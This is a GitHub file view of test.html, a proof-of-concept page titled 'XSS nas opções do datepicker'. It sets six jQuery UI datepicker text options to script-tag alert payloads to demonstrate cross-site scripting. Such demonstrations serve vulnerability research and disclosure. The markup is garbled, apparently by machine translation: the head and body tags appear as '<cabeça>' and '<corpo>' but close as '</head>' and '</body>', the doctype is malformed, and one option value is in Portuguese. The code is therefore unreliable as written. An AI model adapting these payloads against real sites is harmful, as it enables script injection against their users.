-
Notifications
You must be signed in to change notification settings - Fork 0
/
test.html
27 lines (26 loc) · 961 Bytes
/
test.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<!DOCTYPEhtml>
<html xmlns="http://www.w3.org/1999/xhtml">
<cabeça>
<title>XSS nas opções do datepicker</title>
<script src="https://code.jquery.com/jquery-3.3.1.js"></script>
<script src="https://code.jquery.com/ui/1.12.1/jquery-ui.js"></script>
<link rel="stylesheet" type="text/css" href="http://code.jquery.com/ui/1.12.1/themes/base/jquery-ui.css">
<script>
$(document).ready(function() {
$( "#datepicker" ).datepicker({
showButtonPanel: true,
showOn: "ambos",
closeText: '<script>alert("closeText XSS")<\/script>',
currentText: '<script>alert("currentText XSS")<\/script>',
prevText: '<script>alert("prevText XSS")<\/script>',
nextText: '<script>alert("nextText XSS")<\/script>',
buttonText: '<script>alert("buttonText XSS")<\/script>',
appendText: '<script>alert("appendText XSS")<\/script>'
});
});
</script>
</head>
<corpo>
<p>Data: <input type="text" id="datepicker"></p>
</body>
</html>